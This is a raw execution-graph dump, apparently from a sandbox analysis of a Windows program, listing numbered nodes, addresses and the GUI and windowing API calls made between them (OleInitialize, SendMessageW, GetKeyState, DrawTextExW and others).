                                                  execution_graph 63245 154121c0 63246 154121da 63245->63246 63247 154121ed 63245->63247 63253 15411118 63246->63253 63258 15411128 63247->63258 63250 15412202 63251 15412233 63250->63251 63252 15411118 OleInitialize 63250->63252 63252->63251 63254 15411123 63253->63254 63255 1541225e 63254->63255 63263 15412297 63254->63263 63269 15412298 63254->63269 63255->63247 63260 15411133 63258->63260 63259 15412876 63259->63250 63260->63259 63282 154148d0 63260->63282 63288 154148e0 63260->63288 63264 154125a0 63263->63264 63265 154122c0 63263->63265 63264->63255 63266 154122c9 63265->63266 63275 154111b4 63265->63275 63266->63255 63268 154122ec 63270 154125a0 63269->63270 63271 154122c0 63269->63271 63270->63255 63272 154122c9 63271->63272 63273 154111b4 OleInitialize 63271->63273 63272->63255 63274 154122ec 63273->63274 63274->63274 63276 154111bf 63275->63276 63277 154125e3 63276->63277 63279 154111d0 63276->63279 63277->63268 63280 15412618 OleInitialize 63279->63280 63281 1541267c 63280->63281 63281->63277 63283 154148da 63282->63283 63284 15414931 GetFocus 63283->63284 63285 1541499e 63283->63285 63286 15414959 63284->63286 63285->63259 63286->63285 63287 1541499c KiUserCallbackDispatcher 63286->63287 63287->63285 63289 15414924 63288->63289 63291 1541499e 63288->63291 63290 15414931 GetFocus 63289->63290 63289->63291 63292 15414959 63290->63292 63291->63259 63292->63291 63293 1541499c KiUserCallbackDispatcher 63292->63293 63293->63291 63294 7d2c3d0 63295 7d2c412 63294->63295 63296 7d2c418 SetWindowTextW 63294->63296 63295->63296 63297 7d2c449 63296->63297 63298 15411a43 63299 15411a56 63298->63299 63304 7d2f680 63299->63304 63307 7d2f688 PostMessageW 63299->63307 63309 7d2f72a 63299->63309 63300 15411a79 63305 7d2f688 PostMessageW 63304->63305 63306 7d2f6f4 63305->63306 63306->63300 63308 7d2f6f4 63307->63308 63308->63300 63310 7d2f6d5 PostMessageW 63309->63310 63311 7d2f6f4 63310->63311 63311->63300 63967 7d2b430 63970 7d2b456 63967->63970 63968 7d2b46a 63969 7d2b547 63977 3f8efb0 63969->63977 63970->63968 63970->63969 63974 7d2b5aa 63970->63974 63973 7d2b5a5 63974->63973 63975 7d2453c 2 API calls 63974->63975 63975->63973 63978 3f8efde 63977->63978 63980 3f8f007 63978->63980 63983 3f8f0af 63978->63983 63992 3f8eba0 GetFocus 63978->63992 63980->63983 63984 99b5450 15 API calls 63980->63984 63986 99b5440 63980->63986 63981 3f8f056 63982 3f8f0aa KiUserCallbackDispatcher 63981->63982 63982->63983 63984->63981 63987 99b5460 63986->63987 63988 99b549d 63987->63988 63989 7d2b7d0 4 API calls 63987->63989 63990 7d2b7c0 4 API calls 63987->63990 63991 7d2bab7 15 API calls 63987->63991 63988->63981 63989->63988 63990->63988 63991->63988 63992->63980 63824 99b52d8 63825 99b52e8 63824->63825 63826 99b41d4 15 API calls 63825->63826 63827 99b5301 63826->63827 63828 99b5311 63827->63828 63835 99b6920 63827->63835 63847 99b6911 63827->63847 63859 7d2c311 63827->63859 63865 7d2c320 63827->63865 63871 7d2f0a0 63827->63871 63882 7d2f093 63827->63882 63839 99b694c 63835->63839 63837 99b5450 15 API calls 63838 99b6d2c 63837->63838 63838->63828 63845 99b6b84 63839->63845 63893 99b651c 63839->63893 63840 99b6a05 63841 99b5450 15 API calls 63840->63841 63846 99b6aad 63840->63846 63842 99b6a77 63841->63842 63843 99b5450 15 API calls 63842->63843 63843->63846 63845->63837 63845->63838 63899 99b5450 63846->63899 63852 99b694c 63847->63852 63848 99b651c 15 API calls 63853 99b6a05 63848->63853 63849 99b6b84 63850 99b5450 15 API calls 63849->63850 63851 99b6d2c 63849->63851 63850->63851 63851->63828 63852->63848 63852->63849 63854 99b5450 15 API calls 63853->63854 63856 99b6aad 63853->63856 63855 99b6a77 63854->63855 63857 99b5450 15 API calls 63855->63857 63858 99b5450 15 API calls 63856->63858 63857->63856 63858->63849 63860 7d2c355 63859->63860 63863 99b6911 15 API calls 63860->63863 63864 99b6920 15 API calls 63860->63864 63947 99b6bcc 63860->63947 63861 7d2c3aa 63861->63828 63863->63861 63864->63861 63866 7d2c355 63865->63866 63868 99b6bcc 15 API calls 63866->63868 63869 99b6911 15 API calls 63866->63869 63870 99b6920 15 API calls 63866->63870 63867 7d2c3aa 63867->63828 63868->63867 63869->63867 63870->63867 63872 7d2f0c5 63871->63872 63873 7d2f128 63872->63873 63874 7d2459c 2 API calls 63872->63874 63880 99b6911 15 API calls 63873->63880 63881 99b6920 15 API calls 63873->63881 63874->63873 63875 7d2f132 63876 7d2459c 2 API calls 63875->63876 63877 7d2f184 63875->63877 63876->63877 63878 7d2f22f 63877->63878 63953 7d2cf7c 63877->63953 63880->63875 63881->63875 63883 7d2f0c5 63882->63883 63884 7d2f128 63883->63884 63885 7d2459c 2 API calls 63883->63885 63891 99b6911 15 API calls 63884->63891 63892 99b6920 15 API calls 63884->63892 63885->63884 63886 7d2f132 63887 7d2459c 2 API calls 63886->63887 63889 7d2f184 63886->63889 63887->63889 63888 7d2f22f 63889->63888 63890 7d2cf7c 3 API calls 63889->63890 63890->63889 63891->63886 63892->63886 63896 99b6527 63893->63896 63894 99b6ec7 63894->63840 63895 99b5450 15 API calls 63898 99b6e89 63895->63898 63896->63894 63897 99b5450 15 API calls 63896->63897 63896->63898 63897->63898 63898->63894 63898->63895 63900 99b5460 63899->63900 63901 99b549d 63900->63901 63904 7d2bab7 15 API calls 63900->63904 63905 7d2b7c0 63900->63905 63914 7d2b7d0 63900->63914 63901->63845 63904->63901 63907 7d2b809 63905->63907 63923 7d2453c 63907->63923 63908 7d2ba2f 63912 99b02f0 KiUserCallbackDispatcher 63908->63912 63913 99b02e0 KiUserCallbackDispatcher 63908->63913 63909 7d2ba90 63909->63909 63910 7d2b91d 63910->63908 63935 7d2458c 63910->63935 63912->63909 63913->63909 63916 7d2b809 63914->63916 63915 7d2453c 2 API calls 63919 7d2b91d 63915->63919 63916->63915 63917 7d2ba2f 63921 99b02f0 KiUserCallbackDispatcher 63917->63921 63922 99b02e0 KiUserCallbackDispatcher 63917->63922 63918 7d2ba90 63918->63918 63919->63917 63920 7d2458c 2 API calls 63919->63920 63920->63917 63921->63918 63922->63918 63924 7d24547 63923->63924 63925 7d24e31 63924->63925 63931 7d24e84 63924->63931 63946 7d2457c SendMessageW SendMessageW 63924->63946 63926 7d24e6a 63925->63926 63927 7d2458c 2 API calls 63925->63927 63928 7d2458c 2 API calls 63926->63928 63929 7d24e5c 63927->63929 63930 7d24e76 63928->63930 63941 7d2459c 63929->63941 63933 7d2459c 2 API calls 63930->63933 63931->63910 63933->63931 63937 7d24597 63935->63937 63936 7d2cb96 63936->63908 63937->63936 63939 7d2cc10 SendMessageW 63937->63939 63940 7d2cc18 SendMessageW 63937->63940 63938 7d2cc01 63938->63908 63939->63938 63940->63938 63942 7d245a7 63941->63942 63944 7d2cc10 SendMessageW 63942->63944 63945 7d2cc18 SendMessageW 63942->63945 63943 7d2cc01 63943->63926 63944->63943 63945->63943 63946->63925 63948 99b6bd5 63947->63948 63950 99b6bf3 63947->63950 63949 99b5450 15 API calls 63948->63949 63948->63950 63949->63950 63951 99b5450 15 API calls 63950->63951 63952 99b6d2c 63950->63952 63951->63952 63952->63861 63954 7d2cf87 63953->63954 63956 7d2f680 PostMessageW 63954->63956 63957 7d2f72a PostMessageW 63954->63957 63958 7d2f688 PostMessageW 63954->63958 63955 7d2f4e2 63955->63877 63956->63955 63957->63955 63958->63955 63993 99b2df8 SetWindowLongW 63994 99b2e64 63993->63994 63995 99f5278 63997 3f8efb0 17 API calls 63995->63997 63996 99f528c 63997->63996 63761 7d2f378 63762 7d2f385 63761->63762 63766 7d2f39a 63762->63766 63771 7d2f3a8 63762->63771 63763 7d2f394 63767 7d2f3a5 63766->63767 63776 7d2cc10 63767->63776 63779 7d2cc18 SendMessageW 63767->63779 63768 7d2f3c9 63768->63763 63772 7d2f3b8 63771->63772 63774 7d2cc10 SendMessageW 63772->63774 63775 7d2cc18 SendMessageW 63772->63775 63773 7d2f3c9 63773->63763 63774->63773 63775->63773 63777 7d2cc18 SendMessageW 63776->63777 63778 7d2cc84 63777->63778 63778->63768 63780 7d2cc84 63779->63780 63780->63768 63781 7d23578 63785 7d23590 63781->63785 63789 7d235a0 63781->63789 63782 7d2358c 63793 7d236e0 63785->63793 63802 7d23679 63785->63802 63786 7d235de 63786->63782 63790 7d235de 63789->63790 63791 7d236e0 16 API calls 63789->63791 63792 7d23679 15 API calls 63789->63792 63790->63782 63791->63790 63792->63790 63794 7d236ee 63793->63794 63795 7d2369a 63794->63795 63797 7d236fe 63794->63797 63807 99b7f18 63795->63807 63811 99bb990 63795->63811 63796 7d236ba 63796->63786 63798 7d237e5 63797->63798 63814 7d296e8 63797->63814 63798->63786 63803 7d2369a 63802->63803 63805 99b7f18 15 API calls 63803->63805 63806 99bb990 15 API calls 63803->63806 63804 7d236ba 63804->63786 63805->63804 63806->63804 63808 99b7f23 63807->63808 63809 99bb9b7 63808->63809 63810 99bb09c 15 API calls 63808->63810 63809->63796 63810->63809 63812 99bb09c 15 API calls 63811->63812 63813 99bb9b7 63812->63813 63813->63796 63815 7d2973b 63814->63815 63816 7d29759 MonitorFromPoint 63815->63816 63817 7d2978a 63815->63817 63816->63817 63817->63798 63818 99b2bb0 63819 99b2c18 CreateWindowExW 63818->63819 63821 99b2cd4 63819->63821 63312 99ff810 63315 99b9a68 63312->63315 63313 99ff815 63316 99b9a8b 63315->63316 63317 99b9aa8 63316->63317 63322 99ff819 63316->63322 63326 99ff7e0 63316->63326 63330 99ff827 63316->63330 63334 99ff828 63316->63334 63317->63313 63323 99ff7f4 63322->63323 63323->63322 63338 99f5ec4 63323->63338 63327 99ff7f4 63326->63327 63328 99f5ec4 DrawTextExW 63327->63328 63329 99ff8b9 63328->63329 63331 99ff83e 63330->63331 63332 99f5ec4 DrawTextExW 63331->63332 63333 99ff8b9 63332->63333 63335 99ff83e 63334->63335 63336 99f5ec4 DrawTextExW 63335->63336 63337 99ff8b9 63336->63337 63339 99f5ecf 63338->63339 63340 99f64ca 63339->63340 63342 99f5ee4 63339->63342 63343 99f5eef 63342->63343 63344 99fb6a7 63343->63344 63347 99fb6bf 63343->63347 63351 99fb6c0 63343->63351 63344->63340 63348 99fb6c9 63347->63348 63355 99fb6f9 63348->63355 63349 99fb6ee 63349->63344 63352 99fb6c9 63351->63352 63354 99fb6f9 DrawTextExW 63352->63354 63353 99fb6ee 63353->63344 63354->63353 63356 99fb732 63355->63356 63357 99fb743 63355->63357 63356->63349 63358 99fb7d1 63357->63358 63361 99fbe30 63357->63361 63366 99fbe2f 63357->63366 63358->63349 63362 99fbe58 63361->63362 63363 99fbf5e 63362->63363 63371 99ffa71 63362->63371 63376 99ffa80 63362->63376 63363->63356 63367 99fbe58 63366->63367 63368 99fbf5e 63367->63368 63369 99ffa71 DrawTextExW 63367->63369 63370 99ffa80 DrawTextExW 63367->63370 63368->63356 63369->63368 63370->63368 63372 99ffa96 63371->63372 63381 99ffed9 63372->63381 63387 99ffee8 63372->63387 63373 99ffb0c 63373->63363 63377 99ffa96 63376->63377 63379 99ffed9 DrawTextExW 63377->63379 63380 99ffee8 DrawTextExW 63377->63380 63378 99ffb0c 63378->63363 63379->63378 63380->63378 63382 99ffec6 63381->63382 63383 99ffee6 63381->63383 63382->63373 63391 99fff18 63383->63391 63395 99fff28 63383->63395 63384 99fff06 63384->63373 63388 99fff06 63387->63388 63389 99fff18 DrawTextExW 63387->63389 63390 99fff28 DrawTextExW 63387->63390 63388->63373 63389->63388 63390->63388 63392 99fff59 63391->63392 63393 99fff86 63392->63393 63394 3f8fea8 DrawTextExW 63392->63394 63393->63384 63394->63393 63396 99fff59 63395->63396 63397 99fff86 63396->63397 63398 3f8fea8 DrawTextExW 63396->63398 63397->63384 63398->63397 63959 99f6850 63961 99f531e 15 API calls 63959->63961 63963 99f5320 63959->63963 63960 99f686d 63961->63960 63964 99f5336 63963->63964 63965 99bb09c 15 API calls 63963->63965 63966 99bb9c0 15 API calls 63963->63966 63964->63960 63965->63964 63966->63964 63822 3f8e4c8 DuplicateHandle 63823 3f8e55e 63822->63823 63998 15418bb0 63999 15418bb8 KiUserCallbackDispatcher 63998->63999 64000 15418c1f 63999->64000 63399 3f3d060 63400 3f3d078 63399->63400 63401 3f3d0d2 63400->63401 63406 99b3ab9 63400->63406 63415 99b2d63 63400->63415 63419 99b1ffc 63400->63419 63428 99b2d68 63400->63428 63409 99b3af5 63406->63409 63407 99b3b29 63448 99b2124 63407->63448 63409->63407 63410 99b3b19 63409->63410 63432 99b3d1c 63410->63432 63438 99b3c40 63410->63438 63443 99b3c50 63410->63443 63411 99b3b27 63416 99b2d68 63415->63416 63417 99b1ffc 15 API calls 63416->63417 63418 99b2daf 63417->63418 63418->63401 63420 99b2007 63419->63420 63421 99b3b29 63420->63421 63423 99b3b19 63420->63423 63422 99b2124 15 API calls 63421->63422 63424 99b3b27 63422->63424 63425 99b3d1c 15 API calls 63423->63425 63426 99b3c50 15 API calls 63423->63426 63427 99b3c40 15 API calls 63423->63427 63425->63424 63426->63424 63427->63424 63429 99b2d8e 63428->63429 63430 99b1ffc 15 API calls 63429->63430 63431 99b2daf 63430->63431 63431->63401 63433 99b3cda 63432->63433 63434 99b3d2a 63432->63434 63455 99b3cf9 63433->63455 63470 99b3d08 63433->63470 63435 99b3cf0 63435->63411 63439 99b3c64 63438->63439 63441 99b3cf9 15 API calls 63439->63441 63442 99b3d08 15 API calls 63439->63442 63440 99b3cf0 63440->63411 63441->63440 63442->63440 63444 99b3c64 63443->63444 63446 99b3cf9 15 API calls 63444->63446 63447 99b3d08 15 API calls 63444->63447 63445 99b3cf0 63445->63411 63446->63445 63447->63445 63449 99b212f 63448->63449 63450 99b525c 63449->63450 63451 99b51b2 63449->63451 63452 99b1ffc 14 API calls 63450->63452 63453 99b520a CallWindowProcW 63451->63453 63454 99b51b9 63451->63454 63452->63454 63453->63454 63454->63411 63459 99b3d19 63455->63459 63485 99b4538 63455->63485 63496 7d2e9af 63455->63496 63505 7d2bb69 63455->63505 63510 7d2fce8 63455->63510 63516 7d2fc28 63455->63516 63522 7d2bac8 63455->63522 63545 99b5142 63455->63545 63548 7d2fcea 63455->63548 63554 7d2fc27 63455->63554 63560 99b4528 63455->63560 63571 7d2e9c0 63455->63571 63580 7d2c0b9 63455->63580 63588 7d2bab7 63455->63588 63459->63435 63471 99b3d19 63470->63471 63472 99b4538 15 API calls 63470->63472 63473 7d2bab7 15 API calls 63470->63473 63474 7d2c0b9 15 API calls 63470->63474 63475 7d2e9c0 15 API calls 63470->63475 63476 99b4528 15 API calls 63470->63476 63477 7d2fc27 15 API calls 63470->63477 63478 7d2fcea 15 API calls 63470->63478 63479 99b5142 15 API calls 63470->63479 63480 7d2bac8 15 API calls 63470->63480 63481 7d2fc28 15 API calls 63470->63481 63482 7d2fce8 15 API calls 63470->63482 63483 7d2bb69 15 API calls 63470->63483 63484 7d2e9af 15 API calls 63470->63484 63471->63435 63472->63471 63473->63471 63474->63471 63475->63471 63476->63471 63477->63471 63478->63471 63479->63471 63480->63471 63481->63471 63482->63471 63483->63471 63484->63471 63486 99b4584 63485->63486 63487 99b4e64 GetKeyState 63486->63487 63488 99b4824 63486->63488 63493 99b4f32 63486->63493 63489 99b4e90 GetKeyState 63487->63489 63488->63459 63491 99b4ee3 GetFocus 63489->63491 63491->63493 63493->63488 63617 7d2c138 63493->63617 63622 7d2c128 63493->63622 63498 7d2e9c0 63496->63498 63497 7d2eb0c 63633 7d23d00 GetSystemMetrics GetSystemMetrics 63497->63633 63498->63497 63499 7d2e9e4 63498->63499 63503 7d2ea98 63499->63503 63504 99b5142 15 API calls 63499->63504 63501 7d2eb3b 63634 7d29e74 63501->63634 63503->63459 63504->63503 63506 7d2bb88 63505->63506 63507 7d2bc7b 63506->63507 63637 7d2c098 63506->63637 63642 7d2c088 63506->63642 63507->63459 63511 7d2fcf6 63510->63511 63512 7d2fd28 63510->63512 63513 7d2fcfd 63511->63513 63647 7d2fd50 63511->63647 63653 7d2fd4f 63511->63653 63512->63459 63513->63459 63517 7d2fc4a 63516->63517 63518 7d2fca9 63516->63518 63517->63459 63520 99b4538 15 API calls 63518->63520 63521 99b4528 15 API calls 63518->63521 63519 7d2fcb0 63519->63459 63520->63519 63521->63519 63523 7d2bae1 63522->63523 63529 7d2baf4 63522->63529 63524 7d2bae6 63523->63524 63525 7d2bb28 63523->63525 63526 7d2bb02 63524->63526 63527 7d2baeb 63524->63527 63525->63529 63530 7d2bdb4 63525->63530 63531 7d2bb39 63525->63531 63526->63529 63534 7d2bd20 63526->63534 63535 7d2bc2e 63526->63535 63536 7d2bd7c 63526->63536 63538 7d2bc76 63526->63538 63528 7d2bd12 63527->63528 63527->63529 63659 7d2b1c0 63528->63659 63529->63538 63541 7d2c098 15 API calls 63529->63541 63542 7d2c088 15 API calls 63529->63542 63667 7d2b270 63530->63667 63531->63529 63531->63535 63531->63538 63539 7d2c098 15 API calls 63534->63539 63540 7d2c088 15 API calls 63534->63540 63543 7d2c098 15 API calls 63535->63543 63544 7d2c088 15 API calls 63535->63544 63663 7d2b230 63536->63663 63538->63459 63539->63538 63540->63538 63541->63538 63542->63538 63543->63538 63544->63538 63546 99b2124 15 API calls 63545->63546 63547 99b515a 63546->63547 63547->63459 63549 7d2fcf6 63548->63549 63550 7d2fd28 63548->63550 63551 7d2fcfd 63549->63551 63552 7d2fd50 15 API calls 63549->63552 63553 7d2fd4f 15 API calls 63549->63553 63550->63459 63551->63459 63552->63551 63553->63551 63555 7d2fca9 63554->63555 63557 7d2fc4a 63554->63557 63558 99b4538 15 API calls 63555->63558 63559 99b4528 15 API calls 63555->63559 63556 7d2fcb0 63556->63459 63557->63459 63558->63556 63559->63556 63562 99b4584 63560->63562 63561 99b4824 63561->63459 63562->63561 63563 99b4e64 GetKeyState 63562->63563 63568 99b4f32 63562->63568 63564 99b4e90 GetKeyState 63563->63564 63566 99b4ee3 GetFocus 63564->63566 63566->63568 63568->63561 63569 7d2c138 12 API calls 63568->63569 63570 7d2c128 12 API calls 63568->63570 63569->63561 63570->63561 63572 7d2e9df 63571->63572 63573 7d2eb0c 63572->63573 63574 7d2e9e4 63572->63574 63671 7d23d00 GetSystemMetrics GetSystemMetrics 63573->63671 63578 7d2ea98 63574->63578 63579 99b5142 15 API calls 63574->63579 63576 7d2eb3b 63577 7d29e74 SendMessageW 63576->63577 63577->63578 63578->63459 63579->63578 63581 7d2c070 63580->63581 63582 7d2c0c2 63580->63582 63581->63459 63583 7d2c0e4 63582->63583 63584 99b5142 15 API calls 63582->63584 63585 99b4538 15 API calls 63582->63585 63587 99b4528 15 API calls 63582->63587 63672 99b4caa 63582->63672 63583->63459 63584->63583 63585->63583 63587->63583 63589 7d2ba65 63588->63589 63590 7d2baba 63588->63590 63591 7d2bb69 15 API calls 63589->63591 63592 7d2bae6 63590->63592 63593 7d2bb28 63590->63593 63596 7d2baf4 63590->63596 63603 7d2ba6d 63591->63603 63594 7d2bb02 63592->63594 63595 7d2baeb 63592->63595 63593->63596 63599 7d2bdb4 63593->63599 63600 7d2bb39 63593->63600 63594->63596 63597 7d2bc76 63594->63597 63604 7d2bd7c 63594->63604 63605 7d2bd20 63594->63605 63608 7d2bc2e 63594->63608 63595->63596 63598 7d2bd12 63595->63598 63596->63597 63611 7d2c098 15 API calls 63596->63611 63612 7d2c088 15 API calls 63596->63612 63597->63459 63601 7d2b1c0 15 API calls 63598->63601 63602 7d2b270 15 API calls 63599->63602 63600->63596 63600->63597 63600->63608 63601->63597 63602->63597 63749 99b02e0 63603->63749 63753 99b02f0 63603->63753 63606 7d2b230 15 API calls 63604->63606 63613 7d2c098 15 API calls 63605->63613 63614 7d2c088 15 API calls 63605->63614 63606->63597 63607 7d2ba90 63609 7d2c098 15 API calls 63608->63609 63610 7d2c088 15 API calls 63608->63610 63609->63597 63610->63597 63611->63597 63612->63597 63613->63597 63614->63597 63618 7d2c17e 63617->63618 63619 7d2c1a1 63618->63619 63621 99b2124 15 API calls 63618->63621 63627 99b5160 63618->63627 63619->63488 63621->63619 63623 7d2c12d 63622->63623 63624 7d2c1a1 63623->63624 63625 99b5160 15 API calls 63623->63625 63626 99b2124 15 API calls 63623->63626 63624->63488 63625->63624 63626->63624 63628 99b525c 63627->63628 63629 99b51b2 63627->63629 63630 99b1ffc 14 API calls 63628->63630 63631 99b520a CallWindowProcW 63629->63631 63632 99b51b9 63629->63632 63630->63632 63631->63632 63632->63619 63633->63501 63635 7d2fa60 SendMessageW 63634->63635 63636 7d2facc 63635->63636 63636->63503 63638 7d2c0a3 63637->63638 63639 7d2c0aa 63637->63639 63638->63507 63641 7d2c0b9 15 API calls 63639->63641 63640 7d2c0b0 63640->63507 63641->63640 63643 7d2c089 63642->63643 63643->63643 63644 7d2c0a3 63643->63644 63646 7d2c0b9 15 API calls 63643->63646 63644->63507 63645 7d2c0b0 63645->63507 63646->63645 63648 7d2fdab 63647->63648 63649 7d2fd76 63647->63649 63648->63649 63650 99b4538 15 API calls 63648->63650 63651 99b4528 15 API calls 63648->63651 63652 99b5142 15 API calls 63648->63652 63649->63513 63650->63649 63651->63649 63652->63649 63654 7d2fd76 63653->63654 63655 7d2fdab 63653->63655 63654->63513 63655->63654 63656 99b4538 15 API calls 63655->63656 63657 99b4528 15 API calls 63655->63657 63658 99b5142 15 API calls 63655->63658 63656->63654 63657->63654 63658->63654 63660 7d2b1cb 63659->63660 63661 7d2c098 15 API calls 63660->63661 63662 7d2c2ae 63661->63662 63662->63538 63664 7d2b23b 63663->63664 63665 7d2c098 15 API calls 63664->63665 63666 7d2e5fc 63665->63666 63666->63538 63668 7d2b27b 63667->63668 63669 7d2c098 15 API calls 63668->63669 63670 7d2dfb1 63669->63670 63670->63538 63671->63576 63673 99b4cb8 63672->63673 63676 99b41d4 63673->63676 63678 99b41df 63676->63678 63680 99b42d8 63678->63680 63679 99b4cc0 63679->63583 63681 99b42e3 63680->63681 63682 99b564a 63681->63682 63684 99f531e 63681->63684 63682->63679 63685 99f5329 63684->63685 63687 99f5369 63684->63687 63690 99bb09c 63685->63690 63700 99bb9c0 63685->63700 63686 99f5336 63686->63682 63687->63682 63691 99bb0a7 63690->63691 63692 99bba70 63691->63692 63710 7d23a30 63691->63710 63717 7d23a40 63691->63717 63723 99f687d 63691->63723 63729 99f6880 63691->63729 63735 99bba90 63691->63735 63742 99bba82 63691->63742 63692->63686 63693 99bba3a 63693->63686 63701 99bb9e9 63700->63701 63702 99bba70 63701->63702 63704 99f687d 15 API calls 63701->63704 63705 7d23a40 15 API calls 63701->63705 63706 7d23a30 15 API calls 63701->63706 63707 99bba82 15 API calls 63701->63707 63708 99bba90 15 API calls 63701->63708 63709 99f6880 15 API calls 63701->63709 63702->63686 63703 99bba3a 63703->63686 63704->63703 63705->63703 63706->63703 63707->63703 63708->63703 63709->63703 63711 7d239e5 63710->63711 63712 7d23a33 63710->63712 63711->63693 63714 7d23c85 63712->63714 63715 99bba82 15 API calls 63712->63715 63716 99bba90 15 API calls 63712->63716 63713 7d23cb9 63713->63693 63714->63693 63715->63713 63716->63713 63718 7d23a67 63717->63718 63720 7d23c85 63718->63720 63721 99bba82 15 API calls 63718->63721 63722 99bba90 15 API calls 63718->63722 63719 7d23cb9 63719->63693 63720->63693 63721->63719 63722->63719 63725 99f68a5 63723->63725 63724 99f6914 63724->63693 63726 99f68c2 63725->63726 63727 99bba82 15 API calls 63725->63727 63728 99bba90 15 API calls 63725->63728 63726->63693 63727->63724 63728->63724 63731 99f68a5 63729->63731 63730 99f6914 63730->63693 63732 99f68c2 63731->63732 63733 99bba82 15 API calls 63731->63733 63734 99bba90 15 API calls 63731->63734 63732->63693 63733->63730 63734->63730 63736 99bbabf 63735->63736 63737 99bbb46 63736->63737 63739 99bbb6d 63736->63739 63741 99bbb55 63736->63741 63738 99bb0f0 15 API calls 63737->63738 63738->63741 63740 99b5450 15 API calls 63739->63740 63739->63741 63740->63741 63743 99bbabf 63742->63743 63744 99bbb46 63743->63744 63746 99bbb6d 63743->63746 63748 99bbb55 63743->63748 63745 99bb0f0 15 API calls 63744->63745 63745->63748 63747 99b5450 15 API calls 63746->63747 63746->63748 63747->63748 63751 99b02f0 63749->63751 63750 99b0315 63750->63607 63751->63750 63752 99b0490 KiUserCallbackDispatcher 63751->63752 63752->63750 63754 99b030f 63753->63754 63755 99b0315 63753->63755 63754->63755 63756 99b0490 KiUserCallbackDispatcher 63754->63756 63755->63607 63756->63755 64001 99b83e8 64002 99b8413 64001->64002 64051 99b7e58 64002->64051 64004 99b843e 64056 99b7e88 64004->64056 64006 99b8498 64007 99b7e88 19 API calls 64006->64007 64008 99b84b6 64007->64008 64061 99b7eb8 64008->64061 64011 99b7eb8 19 API calls 64012 99b852e 64011->64012 64065 99b7ec8 64012->64065 64014 99b85cd 64070 99bcc4f 64014->64070 64075 99bcc60 64014->64075 64015 99b85ea 64080 99b7f08 64015->64080 64017 99b8663 64018 99b7f18 15 API calls 64017->64018 64019 99b869d 64018->64019 64087 99f5ddf 64019->64087 64093 99f5dc4 64019->64093 64020 99b8711 64021 99b7f18 15 API calls 64020->64021 64022 99b882f 64021->64022 64023 99b7f18 15 API calls 64022->64023 64024 99b8916 64023->64024 64097 99fae88 64024->64097 64101 99fae51 64024->64101 64025 99b8959 64105 99fedd0 64025->64105 64111 99fedc0 64025->64111 64026 99b8996 64027 99b7f18 15 API calls 64026->64027 64028 99b8a1a 64027->64028 64029 99b7f18 15 API calls 64028->64029 64030 99b8b42 64029->64030 64031 99b7f18 15 API calls 64030->64031 64032 99b8ca8 64031->64032 64033 99b7f18 15 API calls 64032->64033 64034 99b8d5c 64033->64034 64035 99b7f18 15 API calls 64034->64035 64036 99b8e50 64035->64036 64037 99b7f18 15 API calls 64036->64037 64038 99b8f7a 64037->64038 64039 99b7f18 15 API calls 64038->64039 64040 99b90b7 64039->64040 64041 99b7f18 15 API calls 64040->64041 64042 99b91cf 64041->64042 64052 99b7e63 64051->64052 64117 3f88470 64052->64117 64126 3f89970 64052->64126 64053 99b945f 64053->64004 64057 99b7e93 64056->64057 64058 99b9cf3 64057->64058 64059 3f88470 19 API calls 64057->64059 64060 3f89970 19 API calls 64057->64060 64058->64006 64059->64058 64060->64058 64062 99b7ec3 64061->64062 64063 99b8510 64062->64063 64194 99b81d4 64062->64194 64063->64011 64066 99b7ed3 64065->64066 64067 99bae48 64066->64067 64199 99bae9f 64066->64199 64203 99baea0 64066->64203 64067->64014 64071 99bcc79 64070->64071 64072 99bccda 64071->64072 64207 99bcfff 64071->64207 64217 99bd000 64071->64217 64072->64015 64076 99bcc79 64075->64076 64077 99bcfff 17 API calls 64076->64077 64078 99bccda 64076->64078 64079 99bd000 17 API calls 64076->64079 64077->64078 64078->64015 64079->64078 64082 99b7f13 64080->64082 64081 99bb74c 64081->64017 64082->64081 64083 99b7f18 15 API calls 64082->64083 64084 99bb92a 64083->64084 64085 99b7f18 15 API calls 64084->64085 64086 99bb935 64085->64086 64086->64017 64088 99f5db8 64087->64088 64088->64087 64090 99f5de6 64088->64090 64091 99bcfff 17 API calls 64088->64091 64092 99bd000 17 API calls 64088->64092 64089 99f5dda 64089->64020 64090->64020 64091->64089 64092->64089 64094 99f5dda 64093->64094 64095 99bcfff 17 API calls 64093->64095 64096 99bd000 17 API calls 64093->64096 64094->64020 64095->64094 64096->64094 64098 99fae9b 64097->64098 64099 99faebe 64098->64099 64100 99f5ec4 DrawTextExW 64098->64100 64099->64025 64100->64099 64104 99fae64 64101->64104 64102 99faebe 64102->64025 64103 99f5ec4 DrawTextExW 64103->64102 64104->64025 64104->64102 64104->64103 64107 99fee07 64105->64107 64106 99fef60 64106->64026 64107->64106 64261 99ff0bf 64107->64261 64265 99ff0c0 64107->64265 64269 99ff120 64107->64269 64113 99fee07 64111->64113 64112 99fef60 64112->64026 64113->64112 64114 99ff0bf DrawTextExW 64113->64114 64115 99ff120 DrawTextExW 64113->64115 64116 99ff0c0 DrawTextExW 64113->64116 64114->64112 64115->64112 64116->64112 64118 3f8847b 64117->64118 64119 3f899d8 64118->64119 64135 3f89c82 64118->64135 64121 3f89c33 64119->64121 64141 3f8bad0 64119->64141 64120 3f89c71 64120->64053 64121->64120 64145 3f8dbb0 64121->64145 64149 3f8dba0 64121->64149 64127 3f899ab 64126->64127 64128 3f899d8 64127->64128 64131 3f89c82 19 API calls 64127->64131 64130 3f89c33 64128->64130 64132 3f8bad0 2 API calls 64128->64132 64129 3f89c71 64129->64053 64130->64129 64133 3f8dbb0 19 API calls 64130->64133 64134 3f8dba0 19 API calls 64130->64134 64131->64128 64132->64130 64133->64129 64134->64129 64136 3f89c8a 64135->64136 64137 3f89c2c 64135->64137 64136->64119 64138 3f89c71 64137->64138 64139 3f8dbb0 19 API calls 64137->64139 64140 3f8dba0 19 API calls 64137->64140 64138->64119 64139->64138 64140->64138 64154 3f8bef5 64141->64154 64157 3f8bf10 64141->64157 64142 3f8bae6 64142->64121 64147 3f8dbd1 64145->64147 64146 3f8dbf5 64146->64120 64147->64146 64180 3f8e168 64147->64180 64150 3f8db6b 64149->64150 64151 3f8dba6 64149->64151 64150->64120 64152 3f8dbf5 64151->64152 64153 3f8e168 19 API calls 64151->64153 64152->64120 64153->64152 64155 3f8bf1f 64154->64155 64160 3f8bff7 64154->64160 64155->64142 64159 3f8bff7 2 API calls 64157->64159 64158 3f8bf1f 64158->64142 64159->64158 64161 3f8c019 64160->64161 64162 3f8c03c 64160->64162 64161->64162 64168 3f8c2a0 64161->64168 64172 3f8c290 64161->64172 64162->64155 64163 3f8c034 64163->64162 64164 3f8c240 GetModuleHandleW 64163->64164 